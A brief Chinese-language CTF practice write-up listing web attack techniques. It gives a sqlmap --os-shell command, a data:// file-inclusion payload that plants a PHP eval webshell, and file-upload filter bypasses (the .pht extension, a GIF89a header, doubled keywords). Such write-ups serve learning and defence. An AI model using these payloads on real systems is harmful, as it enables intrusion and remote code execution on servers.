【网络安全3x05】CTF8月竞赛学习----------厂家培训-练习赛writeup

发表于 更新于

练习赛的writeup。

太菜了,四道web就搞出来一个。

sql的已经注入了不会弹shell,文件包含也是不会在路径中插入命令,文件上传要学的就更多了,后缀过滤、类型过滤、文件头过滤、文件大小过滤、包内容过滤。

writeup

sql注入

sql注入生成shell:

1
sqlmap -u [url] --os-shell

文件包含

包含反弹shell:

1
2
3
4
5

/?file=data://text/plain,<?php @eval($_POST[gt]);?>

/?file=php://input

文件上传

  1. 后缀黑名单绕过 .pht
  2. 文件大小绕过 复制粘贴
  3. 文件头过滤 GIF89a
  4. 包内容过滤 双写绕过<?php @eval => <<??pphphp @eevalval